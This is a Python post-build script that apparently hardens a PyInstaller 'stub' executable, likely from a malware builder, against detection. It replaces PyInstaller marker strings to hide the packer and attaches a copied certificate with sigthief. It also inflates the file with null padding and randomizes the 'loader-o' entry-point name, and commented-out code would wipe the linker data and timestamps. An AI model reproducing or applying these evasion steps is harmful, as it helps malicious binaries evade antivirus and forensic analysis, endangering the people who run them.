import os
from sigthief import signfile
from PyInstaller.archive.readers import CArchiveReader

def RemoveMetaData(path: str):
    print("Removing MetaData")
    with open(path, "rb") as file:
        data = file.read()
    
    # Remove pyInstaller strings
    data = data.replace(b"PyInstaller:", b"PyInstallem:")
    data = data.replace(b"pyi-runtime-tmpdir", b"bye-runtime-tmpdir")
    data = data.replace(b"pyi-windows-manifest-filename", b"bye-windows-manifest-filename")

    # # Remove linker information
    # start_index = data.find(b"$") + 1
    # end_index = data.find(b"PE\x00\x00", start_index) - 1
    # data = data[:start_index] + bytes([0] * (end_index - start_index))  + data[end_index:]

    # # Remove compilation timestamp
    # start_index = data.find(b"PE\x00\x00") + 8
    # end_index = start_index + 4
    # data = data[:start_index] + bytes([0] * (end_index - start_index))  + data[end_index:]
    
    with open(path, "wb") as file:
        file.write(data)

def AddCertificate(path: str):
    print("Adding Certificate")
    certFile = "cert"
    if os.path.isfile(certFile):
        signfile(path, certFile, path)

def PumpStub(path: str, pumpFile: str):
    print("Pumping Stub")
    try:
        pumpedSize = 0
        if os.path.isfile(pumpFile):
            with open(pumpFile, "r") as file:
                pumpedSize = int(file.read())
    
        if pumpedSize > 0 and os.path.isfile(path):
            reader = CArchiveReader(path)
            offset = reader._start_offset

            with open(path, "r+b") as file:
                data = file.read()
                if pumpedSize > len(data):
                    pumpedSize -= len(data)
                    file.seek(0)
                    file.write(data[:offset] + b"\x00" * pumpedSize + data[offset:])
    except Exception:
        pass

def RenameEntryPoint(path: str, entryPoint: str):
    print("Renaming Entry Point")
    with open(path, "rb") as file:
        data = file.read()

    entryPoint = entryPoint.encode()
    new_entryPoint = b'\x00' + os.urandom(len(entryPoint) - 1)
    data = data.replace(entryPoint, new_entryPoint)

    with open(path, "wb") as file:
        file.write(data)

if __name__ == "__main__":
    builtFile = os.path.join("dist", "based.exe")
    if os.path.isfile(builtFile):
        RemoveMetaData(builtFile)
        AddCertificate(builtFile)
        PumpStub(builtFile, "pumpStub")
        RenameEntryPoint(builtFile, "loader-o")
    else:
        print("Not Found")